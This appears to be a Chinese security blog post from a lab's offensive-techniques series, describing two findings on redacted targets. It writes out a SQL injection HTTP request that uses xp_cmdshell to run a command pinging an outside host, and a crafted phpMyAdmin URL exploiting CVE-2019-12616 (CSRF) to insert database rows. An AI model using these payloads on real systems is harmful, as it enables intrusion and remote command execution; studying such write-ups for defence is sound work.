1
某网站https://xxx.xxx.xxx开放了3456端口,集成商通过该平台进行集成测试。该网站API接口接受一个<REQUEST/>形式的请求与服务器的AppServ进行交互,由于对输入过滤不严格,攻击者可以滥用XXX_ID,通过在请求中强制使用属性,将任意SQL语句进行注入,最终导致服务器上的远程代码执行,以及对数据库的完全访问。
POST / HTTP/1.1Host: xxx.xxx.xxx:3456Content-Type: application/xml<REQUEST OBJECT_CLASS="TAktifBankObject" ACTION="GetOrder" DOC_ID="3;/* a */ DECLARE @c varchar(255);/* b */SELECT @c='ping xxx.xxx'+'xxx.net';/*xx*/ EXEC Master.dbo.xp_cmdshell @c;/*xxx*/ EXEC sp_SYS_ProtoOp @id=3" USER_ID="2'" SCEN_ID="3'" ExpectSigned="No" INT_SOFT_ID="xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx" POINT_CODE="tzhr" lang="en"></REQUEST>
2
通过信息收集,发现在https://xxx.xxx.xxx上开放了PHPMyAdmin登录面板,并且使用的是PHPMyAdmin的4.6.6版本,该版本容易受到CVE-2019-12616的攻击。由于在“tbl_sql.php”脚本中对HTTP请求来源验证不足,远程攻击者可以诱骗受害者访问特制网页,并在易受攻击的网站上冒用受害者身份权限执行任意操作,例如执行任意INSERT或DELETE语句。
https://xxx.xxx.xxx/tbl_sql.php?sql_query=INSERT+INTO+%60pma__bookmark%60+(%60id%60%2C+%60dbase%60%2C+%60user%60%2C+%60label%60%2C+%60query%60)+VALUES+(DAYOFWEEK(%27%27)%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27)&show_query=1&db=phpmyadmin&table=pma__bookmark
星光不问赶路人,岁月不负有心人!
加油,网安人!
“攻防技术交流”这一个系列的文章
主要记录日常实战与学习交流的
攻防思路与心得体会
如果你有新奇的攻防idea
非常欢迎与小伙伴们一起分享交流
VX群暗号:
后台回复“ 技术交流 ”获取
入群须知:
纯技术交流群禁止灌水
长期潜水不分享交流的会进行清理
希望大家予以理解
● CTF笔记-reverse第2弹-带你走近逆向世界之逆向初探
● CTF笔记-Web第1弹-看我如何用多种姿势搞定一个SQL注入点
本文始发于微信公众号(西子实验室):安全娱乐圈之攻防技术交流系列文章 第3弹
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论